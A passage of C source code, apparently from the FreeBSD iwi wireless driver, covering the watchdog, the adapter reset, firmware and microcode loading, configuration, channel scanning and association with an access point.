sc->sc_tx_timer = 5; } } static void iwi_start(struct ifnet *ifp) { struct iwi_softc *sc = ifp->if_softc; IWI_LOCK_DECL; IWI_LOCK(sc); iwi_start_locked(ifp); IWI_UNLOCK(sc); } static void iwi_watchdog(void *arg) { struct iwi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IWI_LOCK_ASSERT(sc); if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); ifp->if_oerrors++; ieee80211_runtask(ic, 
&sc->sc_restarttask); } } if (sc->sc_state_timer > 0) { if (--sc->sc_state_timer == 0) { if_printf(ifp, "firmware stuck in state %d, resetting\n", sc->fw_state); if (sc->fw_state == IWI_FW_SCANNING) { struct ieee80211com *ic = ifp->if_l2com; ieee80211_cancel_scan(TAILQ_FIRST(&ic->ic_vaps)); } ieee80211_runtask(ic, &sc->sc_restarttask); sc->sc_state_timer = 3; } } if (sc->sc_busy_timer > 0) { if (--sc->sc_busy_timer == 0) { if_printf(ifp, "firmware command timeout, resetting\n"); ieee80211_runtask(ic, &sc->sc_restarttask); } } callout_reset(&sc->sc_wdtimer, hz, iwi_watchdog, sc); } static int iwi_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct iwi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; IWI_LOCK_DECL; switch (cmd) { case SIOCSIFFLAGS: IWI_LOCK(sc); if (ifp->if_flags & IFF_UP) { if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { iwi_init_locked(sc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) iwi_stop_locked(sc); } IWI_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void iwi_stop_master(struct iwi_softc *sc) { uint32_t tmp; int ntries; /* disable interrupts */ CSR_WRITE_4(sc, IWI_CSR_INTR_MASK, 0); CSR_WRITE_4(sc, IWI_CSR_RST, IWI_RST_STOP_MASTER); for (ntries = 0; ntries < 5; ntries++) { if (CSR_READ_4(sc, IWI_CSR_RST) & IWI_RST_MASTER_DISABLED) break; DELAY(10); } if (ntries == 5) device_printf(sc->sc_dev, "timeout waiting for master\n"); tmp = CSR_READ_4(sc, IWI_CSR_RST); CSR_WRITE_4(sc, IWI_CSR_RST, tmp | IWI_RST_PRINCETON_RESET); sc->flags &= ~IWI_FLAG_FW_INITED; } static int iwi_reset(struct iwi_softc *sc) { uint32_t tmp; int i, ntries; iwi_stop_master(sc); tmp = CSR_READ_4(sc, IWI_CSR_CTL); CSR_WRITE_4(sc, IWI_CSR_CTL, tmp | IWI_CTL_INIT); CSR_WRITE_4(sc, IWI_CSR_READ_INT, IWI_READ_INT_INIT_HOST); /* wait for clock stabilization */ for (ntries = 0; ntries < 1000; ntries++) { if (CSR_READ_4(sc, IWI_CSR_CTL) & IWI_CTL_CLOCK_READY) break; DELAY(200); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for clock stabilization\n"); return EIO; } tmp = CSR_READ_4(sc, IWI_CSR_RST); CSR_WRITE_4(sc, IWI_CSR_RST, tmp | IWI_RST_SOFT_RESET); DELAY(10); tmp = CSR_READ_4(sc, IWI_CSR_CTL); CSR_WRITE_4(sc, IWI_CSR_CTL, tmp | IWI_CTL_INIT); /* clear NIC memory */ CSR_WRITE_4(sc, IWI_CSR_AUTOINC_ADDR, 0); for (i = 0; i < 0xc000; i++) CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, 0); return 0; } static const struct iwi_firmware_ohdr * iwi_setup_ofw(struct iwi_softc *sc, struct iwi_fw *fw) { const struct firmware *fp = fw->fp; const struct iwi_firmware_ohdr *hdr; if (fp->datasize < sizeof (struct iwi_firmware_ohdr)) { device_printf(sc->sc_dev, "image '%s' too small\n", fp->name); return NULL; } hdr = (const struct iwi_firmware_ohdr *)fp->data; if ((IWI_FW_GET_MAJOR(le32toh(hdr->version)) != IWI_FW_REQ_MAJOR) || (IWI_FW_GET_MINOR(le32toh(hdr->version)) != IWI_FW_REQ_MINOR)) { device_printf(sc->sc_dev, "version for '%s' %d.%d != %d.%d\n", fp->name, IWI_FW_GET_MAJOR(le32toh(hdr->version)), IWI_FW_GET_MINOR(le32toh(hdr->version)), IWI_FW_REQ_MAJOR, IWI_FW_REQ_MINOR); return NULL; } fw->data = ((const char *) fp->data) + sizeof(struct iwi_firmware_ohdr); fw->size = fp->datasize - sizeof(struct iwi_firmware_ohdr); fw->name = fp->name; return hdr; } static const struct 
iwi_firmware_ohdr * iwi_setup_oucode(struct iwi_softc *sc, struct iwi_fw *fw) { const struct iwi_firmware_ohdr *hdr; hdr = iwi_setup_ofw(sc, fw); if (hdr != NULL && le32toh(hdr->mode) != IWI_FW_MODE_UCODE) { device_printf(sc->sc_dev, "%s is not a ucode image\n", fw->name); hdr = NULL; } return hdr; } static void iwi_getfw(struct iwi_fw *fw, const char *fwname, struct iwi_fw *uc, const char *ucname) { if (fw->fp == NULL) fw->fp = firmware_get(fwname); /* NB: pre-3.0 ucode is packaged separately */ if (uc->fp == NULL && fw->fp != NULL && fw->fp->version < 300) uc->fp = firmware_get(ucname); } /* * Get the required firmware images if not already loaded. * Note that we hold firmware images so long as the device * is marked up in case we need to reload them on device init. * This is necessary because we re-init the device sometimes * from a context where we cannot read from the filesystem * (e.g. from the taskqueue thread when rfkill is re-enabled). * XXX return 0 on success, 1 on error. * * NB: the order of get'ing and put'ing images here is * intentional to support handling firmware images bundled * by operating mode and/or all together in one file with * the boot firmware as "master". */ static int iwi_get_firmware(struct iwi_softc *sc, enum ieee80211_opmode opmode) { const struct iwi_firmware_hdr *hdr; const struct firmware *fp; /* invalidate cached firmware on mode change */ if (sc->fw_mode != opmode) iwi_put_firmware(sc); switch (opmode) { case IEEE80211_M_STA: iwi_getfw(&sc->fw_fw, "iwi_bss", &sc->fw_uc, "iwi_ucode_bss"); break; case IEEE80211_M_IBSS: iwi_getfw(&sc->fw_fw, "iwi_ibss", &sc->fw_uc, "iwi_ucode_ibss"); break; case IEEE80211_M_MONITOR: iwi_getfw(&sc->fw_fw, "iwi_monitor", &sc->fw_uc, "iwi_ucode_monitor"); break; default: device_printf(sc->sc_dev, "unknown opmode %d\n", opmode); return EINVAL; } fp = sc->fw_fw.fp; if (fp == NULL) { device_printf(sc->sc_dev, "could not load firmware\n"); goto bad; } if (fp->version < 300) { /* * Firmware prior to 3.0 was packaged as separate * boot, firmware, and ucode images. Verify the * ucode image was read in, retrieve the boot image * if needed, and check version stamps for consistency. * The version stamps in the data are also checked * above; this is a bit paranoid but is a cheap * safeguard against mis-packaging. */ if (sc->fw_uc.fp == NULL) { device_printf(sc->sc_dev, "could not load ucode\n"); goto bad; } if (sc->fw_boot.fp == NULL) { sc->fw_boot.fp = firmware_get("iwi_boot"); if (sc->fw_boot.fp == NULL) { device_printf(sc->sc_dev, "could not load boot firmware\n"); goto bad; } } if (sc->fw_boot.fp->version != sc->fw_fw.fp->version || sc->fw_boot.fp->version != sc->fw_uc.fp->version) { device_printf(sc->sc_dev, "firmware version mismatch: " "'%s' is %d, '%s' is %d, '%s' is %d\n", sc->fw_boot.fp->name, sc->fw_boot.fp->version, sc->fw_uc.fp->name, sc->fw_uc.fp->version, sc->fw_fw.fp->name, sc->fw_fw.fp->version ); goto bad; } /* * Check and setup each image. */ if (iwi_setup_oucode(sc, &sc->fw_uc) == NULL || iwi_setup_ofw(sc, &sc->fw_boot) == NULL || iwi_setup_ofw(sc, &sc->fw_fw) == NULL) goto bad; } else { /* * Check and setup combined image. 
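* (The boot, ucode and main firmware sections are stored back-to-back after the header; their sizes come from the header's bsize, usize and fsize fields.)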
*/ if (fp->datasize < sizeof(struct iwi_firmware_hdr)) { device_printf(sc->sc_dev, "image '%s' too small\n", fp->name); goto bad; } hdr = (const struct iwi_firmware_hdr *)fp->data; if (fp->datasize < sizeof(*hdr) + le32toh(hdr->bsize) + le32toh(hdr->usize) + le32toh(hdr->fsize)) { device_printf(sc->sc_dev, "image '%s' too small (2)\n", fp->name); goto bad; } sc->fw_boot.data = ((const char *) fp->data) + sizeof(*hdr); sc->fw_boot.size = le32toh(hdr->bsize); sc->fw_boot.name = fp->name; sc->fw_uc.data = sc->fw_boot.data + sc->fw_boot.size; sc->fw_uc.size = le32toh(hdr->usize); sc->fw_uc.name = fp->name; sc->fw_fw.data = sc->fw_uc.data + sc->fw_uc.size; sc->fw_fw.size = le32toh(hdr->fsize); sc->fw_fw.name = fp->name; } #if 0 device_printf(sc->sc_dev, "boot %d ucode %d fw %d bytes\n", sc->fw_boot.size, sc->fw_uc.size, sc->fw_fw.size); #endif sc->fw_mode = opmode; return 0; bad: iwi_put_firmware(sc); return 1; } static void iwi_put_fw(struct iwi_fw *fw) { if (fw->fp != NULL) { firmware_put(fw->fp, FIRMWARE_UNLOAD); fw->fp = NULL; } fw->data = NULL; fw->size = 0; fw->name = NULL; } /* * Release any cached firmware images. */ static void iwi_put_firmware(struct iwi_softc *sc) { iwi_put_fw(&sc->fw_uc); iwi_put_fw(&sc->fw_fw); iwi_put_fw(&sc->fw_boot); } static int iwi_load_ucode(struct iwi_softc *sc, const struct iwi_fw *fw) { uint32_t tmp; const uint16_t *w; const char *uc = fw->data; size_t size = fw->size; int i, ntries, error; IWI_LOCK_ASSERT(sc); error = 0; CSR_WRITE_4(sc, IWI_CSR_RST, CSR_READ_4(sc, IWI_CSR_RST) | IWI_RST_STOP_MASTER); for (ntries = 0; ntries < 5; ntries++) { if (CSR_READ_4(sc, IWI_CSR_RST) & IWI_RST_MASTER_DISABLED) break; DELAY(10); } if (ntries == 5) { device_printf(sc->sc_dev, "timeout waiting for master\n"); error = EIO; goto fail; } MEM_WRITE_4(sc, 0x3000e0, 0x80000000); DELAY(5000); tmp = CSR_READ_4(sc, IWI_CSR_RST); tmp &= ~IWI_RST_PRINCETON_RESET; CSR_WRITE_4(sc, IWI_CSR_RST, tmp); DELAY(5000); MEM_WRITE_4(sc, 0x3000e0, 0); DELAY(1000); MEM_WRITE_4(sc, IWI_MEM_EEPROM_EVENT, 1); DELAY(1000); MEM_WRITE_4(sc, IWI_MEM_EEPROM_EVENT, 0); DELAY(1000); MEM_WRITE_1(sc, 0x200000, 0x00); MEM_WRITE_1(sc, 0x200000, 0x40); DELAY(1000); /* write microcode into adapter memory */ for (w = (const uint16_t *)uc; size > 0; w++, size -= 2) MEM_WRITE_2(sc, 0x200010, htole16(*w)); MEM_WRITE_1(sc, 0x200000, 0x00); MEM_WRITE_1(sc, 0x200000, 0x80); /* wait until we get an answer */ for (ntries = 0; ntries < 100; ntries++) { if (MEM_READ_1(sc, 0x200000) & 1) break; DELAY(100); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for ucode to initialize\n"); error = EIO; goto fail; } /* read the answer or the firmware will not initialize properly */ for (i = 0; i < 7; i++) MEM_READ_4(sc, 0x200004); MEM_WRITE_1(sc, 0x200000, 0x00); fail: return error; } /* macro to handle unaligned little endian data in firmware image */ #define GETLE32(p) ((p)[0] | (p)[1] << 8 | (p)[2] << 16 | (p)[3] << 24) static int iwi_load_firmware(struct iwi_softc *sc, const struct iwi_fw *fw) { u_char *p, *end; uint32_t sentinel, ctl, src, dst, sum, len, mlen, tmp; int ntries, error; IWI_LOCK_ASSERT(sc); /* copy firmware image to DMA memory */ memcpy(sc->fw_virtaddr, fw->data, fw->size); /* make sure the adapter will get up-to-date values */ bus_dmamap_sync(sc->fw_dmat, sc->fw_map, BUS_DMASYNC_PREWRITE); /* tell the adapter where the command blocks are stored */ MEM_WRITE_4(sc, 0x3000a0, 0x27000); /* * Store command blocks into adapter's internal memory using register * indirections. 
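* Each command block is four 32-bit words: a control word (the default flags or'd with the chunk length), the source (DMA) address, the destination address in adapter memory and an xor checksum of the previous three.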
The adapter will read the firmware image through DMA * using information stored in command blocks. */ src = sc->fw_physaddr; p = sc->fw_virtaddr; end = p + fw->size; CSR_WRITE_4(sc, IWI_CSR_AUTOINC_ADDR, 0x27000); while (p < end) { dst = GETLE32(p); p += 4; src += 4; len = GETLE32(p); p += 4; src += 4; p += len; while (len > 0) { mlen = min(len, IWI_CB_MAXDATALEN); ctl = IWI_CB_DEFAULT_CTL | mlen; sum = ctl ^ src ^ dst; /* write a command block */ CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, ctl); CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, src); CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, dst); CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, sum); src += mlen; dst += mlen; len -= mlen; } } /* write a fictive final command block (sentinel) */ sentinel = CSR_READ_4(sc, IWI_CSR_AUTOINC_ADDR); CSR_WRITE_4(sc, IWI_CSR_AUTOINC_DATA, 0); tmp = CSR_READ_4(sc, IWI_CSR_RST); tmp &= ~(IWI_RST_MASTER_DISABLED | IWI_RST_STOP_MASTER); CSR_WRITE_4(sc, IWI_CSR_RST, tmp); /* tell the adapter to start processing command blocks */ MEM_WRITE_4(sc, 0x3000a4, 0x540100); /* wait until the adapter reaches the sentinel */ for (ntries = 0; ntries < 400; ntries++) { if (MEM_READ_4(sc, 0x3000d0) >= sentinel) break; DELAY(100); } /* sync dma, just in case */ bus_dmamap_sync(sc->fw_dmat, sc->fw_map, BUS_DMASYNC_POSTWRITE); if (ntries == 400) { device_printf(sc->sc_dev, "timeout processing command blocks for %s firmware\n", fw->name); return EIO; } /* we're done with command blocks processing */ MEM_WRITE_4(sc, 0x3000a4, 0x540c00); /* allow interrupts so we know when the firmware is ready */ CSR_WRITE_4(sc, IWI_CSR_INTR_MASK, IWI_INTR_MASK); /* tell the adapter to initialize the firmware */ CSR_WRITE_4(sc, IWI_CSR_RST, 0); tmp = CSR_READ_4(sc, IWI_CSR_CTL); CSR_WRITE_4(sc, IWI_CSR_CTL, tmp | IWI_CTL_ALLOW_STANDBY); /* wait at most one second for firmware initialization to complete */ if ((error = msleep(sc, &sc->sc_mtx, 0, "iwiinit", hz)) != 0) { device_printf(sc->sc_dev, "timeout waiting for %s firmware " "initialization to complete\n", fw->name); } return error; } static int iwi_setpowermode(struct iwi_softc *sc, struct ieee80211vap *vap) { uint32_t data; if (vap->iv_flags & IEEE80211_F_PMGTON) { /* XXX set more fine-grained operation */ data = htole32(IWI_POWER_MODE_MAX); } else data = htole32(IWI_POWER_MODE_CAM); DPRINTF(("Setting power mode to %u\n", le32toh(data))); return iwi_cmd(sc, IWI_CMD_SET_POWER_MODE, &data, sizeof data); } static int iwi_setwepkeys(struct iwi_softc *sc, struct ieee80211vap *vap) { struct iwi_wep_key wepkey; struct ieee80211_key *wk; int error, i; for (i = 0; i < IEEE80211_WEP_NKID; i++) { wk = &vap->iv_nw_keys[i]; wepkey.cmd = IWI_WEP_KEY_CMD_SETKEY; wepkey.idx = i; wepkey.len = wk->wk_keylen; memset(wepkey.key, 0, sizeof wepkey.key); memcpy(wepkey.key, wk->wk_key, wk->wk_keylen); DPRINTF(("Setting wep key index %u len %u\n", wepkey.idx, wepkey.len)); error = iwi_cmd(sc, IWI_CMD_SET_WEP_KEY, &wepkey, sizeof wepkey); if (error != 0) return error; } return 0; } static int iwi_config(struct iwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwi_configuration config; struct iwi_rateset rs; struct iwi_txpower power; uint32_t data; int error, i; IWI_LOCK_ASSERT(sc); DPRINTF(("Setting MAC address to %6D\n", IF_LLADDR(ifp), ":")); error = iwi_cmd(sc, IWI_CMD_SET_MAC_ADDRESS, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); if (error != 0) return error; memset(&config, 0, sizeof config); config.bluetooth_coexistence = sc->bluetooth; config.silence_threshold = 0x1e; config.antenna = 
sc->antenna; config.multicast_enabled = 1; config.answer_pbreq = (ic->ic_opmode == IEEE80211_M_IBSS) ? 1 : 0; config.disable_unicast_decryption = 1; config.disable_multicast_decryption = 1; if (ic->ic_opmode == IEEE80211_M_MONITOR) { config.allow_invalid_frames = 1; config.allow_beacon_and_probe_resp = 1; config.allow_mgt = 1; } DPRINTF(("Configuring adapter\n")); error = iwi_cmd(sc, IWI_CMD_SET_CONFIG, &config, sizeof config); if (error != 0) return error; if (ic->ic_opmode == IEEE80211_M_IBSS) { power.mode = IWI_MODE_11B; power.nchan = 11; for (i = 0; i < 11; i++) { power.chan[i].chan = i + 1; power.chan[i].power = IWI_TXPOWER_MAX; } DPRINTF(("Setting .11b channels tx power\n")); error = iwi_cmd(sc, IWI_CMD_SET_TX_POWER, &power, sizeof power); if (error != 0) return error; power.mode = IWI_MODE_11G; DPRINTF(("Setting .11g channels tx power\n")); error = iwi_cmd(sc, IWI_CMD_SET_TX_POWER, &power, sizeof power); if (error != 0) return error; } memset(&rs, 0, sizeof rs); rs.mode = IWI_MODE_11G; rs.type = IWI_RATESET_TYPE_SUPPORTED; rs.nrates = ic->ic_sup_rates[IEEE80211_MODE_11G].rs_nrates; memcpy(rs.rates, ic->ic_sup_rates[IEEE80211_MODE_11G].rs_rates, rs.nrates); DPRINTF(("Setting .11bg supported rates (%u)\n", rs.nrates)); error = iwi_cmd(sc, IWI_CMD_SET_RATES, &rs, sizeof rs); if (error != 0) return error; memset(&rs, 0, sizeof rs); rs.mode = IWI_MODE_11A; rs.type = IWI_RATESET_TYPE_SUPPORTED; rs.nrates = ic->ic_sup_rates[IEEE80211_MODE_11A].rs_nrates; memcpy(rs.rates, ic->ic_sup_rates[IEEE80211_MODE_11A].rs_rates, rs.nrates); DPRINTF(("Setting .11a supported rates (%u)\n", rs.nrates)); error = iwi_cmd(sc, IWI_CMD_SET_RATES, &rs, sizeof rs); if (error != 0) return error; data = htole32(arc4random()); DPRINTF(("Setting initialization vector to %u\n", le32toh(data))); error = iwi_cmd(sc, IWI_CMD_SET_IV, &data, sizeof data); if (error != 0) return error; /* enable adapter */ DPRINTF(("Enabling adapter\n")); return iwi_cmd(sc, IWI_CMD_ENABLE, NULL, 0); } static __inline void set_scan_type(struct iwi_scan_ext *scan, int ix, int scan_type) { uint8_t *st = &scan->scan_type[ix / 2]; if (ix % 2) *st = (*st & 0xf0) | ((scan_type & 0xf) << 0); else *st = (*st & 0x0f) | ((scan_type & 0xf) << 4); } static int scan_type(const struct ieee80211_scan_state *ss, const struct ieee80211_channel *chan) { /* We can only set one essid for a directed scan */ if (ss->ss_nssid != 0) return IWI_SCAN_TYPE_BDIRECTED; if ((ss->ss_flags & IEEE80211_SCAN_ACTIVE) && (chan->ic_flags & IEEE80211_CHAN_PASSIVE) == 0) return IWI_SCAN_TYPE_BROADCAST; return IWI_SCAN_TYPE_PASSIVE; } static __inline int scan_band(const struct ieee80211_channel *c) { return IEEE80211_IS_CHAN_5GHZ(c) ? IWI_CHAN_5GHZ : IWI_CHAN_2GHZ; } static void iwi_monitor_scan(void *arg, int npending) { struct iwi_softc *sc = arg; IWI_LOCK_DECL; IWI_LOCK(sc); (void) iwi_scanchan(sc, 2000, 0); IWI_UNLOCK(sc); } /* * Start a scan on the current channel or all channels. 
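* A nonzero 'allchan' argument converts the net80211 scan list (ss_chans) into the firmware's band-tagged, run-length encoded channel list; otherwise only ic_curchan is scanned. The 4-bit scan type for each slot is packed two per byte by set_scan_type() above, e.g. set_scan_type(&scan, 5, IWI_SCAN_TYPE_BROADCAST) stores the type in the low nibble of scan_type[2].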
*/ static int iwi_scanchan(struct iwi_softc *sc, unsigned long maxdwell, int allchan) { struct ieee80211com *ic; struct ieee80211_channel *chan; struct ieee80211_scan_state *ss; struct iwi_scan_ext scan; int error = 0; IWI_LOCK_ASSERT(sc); if (sc->fw_state == IWI_FW_SCANNING) { /* * This should not happen as we only trigger scan_next after * completion */ DPRINTF(("%s: called too early - still scanning\n", __func__)); return (EBUSY); } IWI_STATE_BEGIN(sc, IWI_FW_SCANNING); ic = sc->sc_ifp->if_l2com; ss = ic->ic_scan; memset(&scan, 0, sizeof scan); scan.full_scan_index = htole32(++sc->sc_scangen); scan.dwell_time[IWI_SCAN_TYPE_PASSIVE] = htole16(maxdwell); if (ic->ic_flags_ext & IEEE80211_FEXT_BGSCAN) { /* * Use very short dwell times for when we send probe request * frames. Without this bg scans hang. Ideally this should * be handled with early-termination as done by net80211 but * that's not feasible (aborting a scan is problematic). */ scan.dwell_time[IWI_SCAN_TYPE_BROADCAST] = htole16(30); scan.dwell_time[IWI_SCAN_TYPE_BDIRECTED] = htole16(30); } else { scan.dwell_time[IWI_SCAN_TYPE_BROADCAST] = htole16(maxdwell); scan.dwell_time[IWI_SCAN_TYPE_BDIRECTED] = htole16(maxdwell); } /* We can only set one essid for a directed scan */ if (ss->ss_nssid != 0) { error = iwi_cmd(sc, IWI_CMD_SET_ESSID, ss->ss_ssid[0].ssid, ss->ss_ssid[0].len); if (error) return (error); } if (allchan) { int i, next, band, b, bstart; /* * Convert scan list to run-length encoded channel list * the firmware requires (preserving the order setup by * net80211). The first entry in each run specifies the * band and the count of items in the run. */ next = 0; /* next open slot */ bstart = 0; /* NB: not needed, silence compiler */ band = -1; /* NB: impossible value */ KASSERT(ss->ss_last > 0, ("no channels")); for (i = 0; i < ss->ss_last; i++) { chan = ss->ss_chans[i]; b = scan_band(chan); if (b != band) { if (band != -1) scan.channels[bstart] = (next - bstart) | band; /* NB: this allocates a slot for the run-len */ band = b, bstart = next++; } if (next >= IWI_SCAN_CHANNELS) { DPRINTF(("truncating scan list\n")); break; } scan.channels[next] = ieee80211_chan2ieee(ic, chan); set_scan_type(&scan, next, scan_type(ss, chan)); next++; } scan.channels[bstart] = (next - bstart) | band; } else { /* Scan the current channel only */ chan = ic->ic_curchan; scan.channels[0] = 1 | scan_band(chan); scan.channels[1] = ieee80211_chan2ieee(ic, chan); set_scan_type(&scan, 1, scan_type(ss, chan)); } #ifdef IWI_DEBUG if (iwi_debug > 0) { static const char *scantype[8] = { "PSTOP", "PASV", "DIR", "BCAST", "BDIR", "5", "6", "7" }; int i; printf("Scan request: index %u dwell %d/%d/%d\n" , le32toh(scan.full_scan_index) , le16toh(scan.dwell_time[IWI_SCAN_TYPE_PASSIVE]) , le16toh(scan.dwell_time[IWI_SCAN_TYPE_BROADCAST]) , le16toh(scan.dwell_time[IWI_SCAN_TYPE_BDIRECTED]) ); i = 0; do { int run = scan.channels[i]; if (run == 0) break; printf("Scan %d %s channels:", run & 0x3f, run & IWI_CHAN_2GHZ ? "2.4GHz" : "5GHz"); for (run &= 0x3f, i++; run > 0; run--, i++) { uint8_t type = scan.scan_type[i/2]; printf(" %u/%s", scan.channels[i], scantype[(i & 1 ? 
type : type>>4) & 7]); } printf("\n"); } while (i < IWI_SCAN_CHANNELS); } #endif return (iwi_cmd(sc, IWI_CMD_SCAN_EXT, &scan, sizeof scan)); } static int iwi_set_sensitivity(struct iwi_softc *sc, int8_t rssi_dbm) { struct iwi_sensitivity sens; DPRINTF(("Setting sensitivity to %d\n", rssi_dbm)); memset(&sens, 0, sizeof sens); sens.rssi = htole16(rssi_dbm); return iwi_cmd(sc, IWI_CMD_SET_SENSITIVITY, &sens, sizeof sens); } static int iwi_auth_and_assoc(struct iwi_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_node *ni; struct iwi_configuration config; struct iwi_associate *assoc = &sc->assoc; struct iwi_rateset rs; uint16_t capinfo; uint32_t data; int error, mode; IWI_LOCK_ASSERT(sc); ni = ieee80211_ref_node(vap->iv_bss); if (sc->flags & IWI_FLAG_ASSOCIATED) { DPRINTF(("Already associated\n")); return (-1); } IWI_STATE_BEGIN(sc, IWI_FW_ASSOCIATING); error = 0; mode = 0; if (IEEE80211_IS_CHAN_A(ic->ic_curchan)) mode = IWI_MODE_11A; else if (IEEE80211_IS_CHAN_G(ic->ic_curchan)) mode = IWI_MODE_11G; if (IEEE80211_IS_CHAN_B(ic->ic_curchan)) mode = IWI_MODE_11B; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { memset(&config, 0, sizeof config); config.bluetooth_coexistence = sc->bluetooth; config.antenna = sc->antenna; config.multicast_enabled = 1; if (mode == IWI_MODE_11G) config.use_protection = 1; config.answer_pbreq = (vap->iv_opmode == IEEE80211_M_IBSS) ? 1 : 0; config.disable_unicast_decryption = 1; config.disable_multicast_decryption = 1; DPRINTF(("Configuring adapter\n")); error = iwi_cmd(sc, IWI_CMD_SET_CONFIG, &config, sizeof config); if (error != 0) goto done; } #ifdef IWI_DEBUG if (iwi_debug > 0) { printf("Setting ESSID to "); ieee80211_print_essid(ni->ni_essid, ni->ni_esslen); printf("\n"); } #endif error = iwi_cmd(sc, IWI_CMD_SET_ESSID, ni->ni_essid, ni->ni_esslen); if (error != 0) goto done; error = iwi_setpowermode(sc, vap); if (error != 0) goto done; data = htole32(vap->iv_rtsthreshold); DPRINTF(("Setting RTS threshold to %u\n", le32toh(data))); error = iwi_cmd(sc, IWI_CMD_SET_RTS_THRESHOLD, &data, sizeof data); if (error != 0) goto done; data = htole32(vap->iv_fragthreshold); DPRINTF(("Setting fragmentation threshold to %u\n", le32toh(data))); error = iwi_cmd(sc, IWI_CMD_SET_FRAG_THRESHOLD, &data, sizeof data); if (error != 0) goto done; /* the rate set has already been "negotiated" */ memset(&rs, 0, sizeof rs); rs.mode = mode; rs.type = IWI_RATESET_TYPE_NEGOTIATED; rs.nrates = ni->ni_rates.rs_nrates; if (rs.nrates > IWI_RATESET_SIZE) { DPRINTF(("Truncating negotiated rate set from %u\n", rs.nrates)); rs.nrates = IWI_RATESET_SIZE; } memcpy(rs.rates, ni->ni_rates.rs_rates, rs.nrates); DPRINTF(("Setting negotiated rates (%u)\n", rs.nrates)); error = iwi_cmd(sc, IWI_CMD_SET_RATES, &rs, sizeof rs); if (error != 0) goto done; memset(assoc, 0, sizeof *assoc); if ((vap->iv_flags & IEEE80211_F_WME) && ni->ni_ies.wme_ie != NULL) { /* NB: don't treat WME setup as failure */ if (iwi_wme_setparams(sc, ic) == 0 && iwi_wme_setie(sc) == 0) assoc->policy |= htole16(IWI_POLICY_WME); /* XXX complain on failure? 
*/ } if (vap->iv_appie_wpa != NULL) { struct ieee80211_appie *ie = vap->iv_appie_wpa; DPRINTF(("Setting optional IE (len=%u)\n", ie->ie_len)); error = iwi_cmd(sc, IWI_CMD_SET_OPTIE, ie->ie_data, ie->ie_len); if (error != 0) goto done; } error = iwi_set_sensitivity(sc, ic->ic_node_getrssi(ni)); if (error != 0) goto done; assoc->mode = mode; assoc->chan = ic->ic_curchan->ic_ieee; /* * NB: do not arrange for shared key auth w/o privacy * (i.e. a wep key); it causes a firmware error. */ if ((vap->iv_flags & IEEE80211_F_PRIVACY) && ni->ni_authmode == IEEE80211_AUTH_SHARED) { assoc->auth = IWI_AUTH_SHARED; /* * It's possible to have privacy marked but no default * key setup. This typically is due to a user app bug * but if we blindly grab the key the firmware will * barf so avoid it for now. */ if (vap->iv_def_txkey != IEEE80211_KEYIX_NONE) assoc->auth |= vap->iv_def_txkey << 4; error = iwi_setwepkeys(sc, vap); if (error != 0) goto done; } if (vap->iv_flags & IEEE80211_F_WPA) assoc->policy |= htole16(IWI_POLICY_WPA); if (vap->iv_opmode == IEEE80211_M_IBSS && ni->ni_tstamp.tsf == 0) assoc->type = IWI_HC_IBSS_START; else assoc->type = IWI_HC_ASSOC; memcpy(assoc->tstamp, ni->ni_tstamp.data, 8); if (vap->iv_opmode == IEEE80211_M_IBSS) capinfo = IEEE80211_CAPINFO_IBSS; else capinfo = IEEE80211_CAPINFO_ESS; if (vap->iv_flags & IEEE80211_F_PRIVACY) capinfo |= IEEE80211_CAPINFO_PRIVACY; if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) capinfo |= IEEE80211_CAPINFO_SHORT_PREAMBLE; if (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_SLOTTIME) capinfo |= IEEE80211_CAPINFO_SHORT_SLOTTIME; assoc->capinfo = htole16(capinfo); assoc->lintval = htole16(ic->ic_lintval); assoc->intval = htole16(ni->ni_intval); IEEE80211_ADDR_COPY(assoc->bssid, ni->ni_bssid); if (vap->iv_opmode == IEEE80211_M_IBSS) IEEE80211_ADDR_COPY(assoc->dst, ifp->if_broadcastaddr); else IEEE80211_ADDR_COPY(assoc->dst, ni->ni_bssid); DPRINTF(("%s bssid %6D dst %6D channel %u policy 0x%x " "auth %u capinfo 0x%x lintval %u bintval %u\n", assoc->type == IWI_HC_IBSS_START ? 
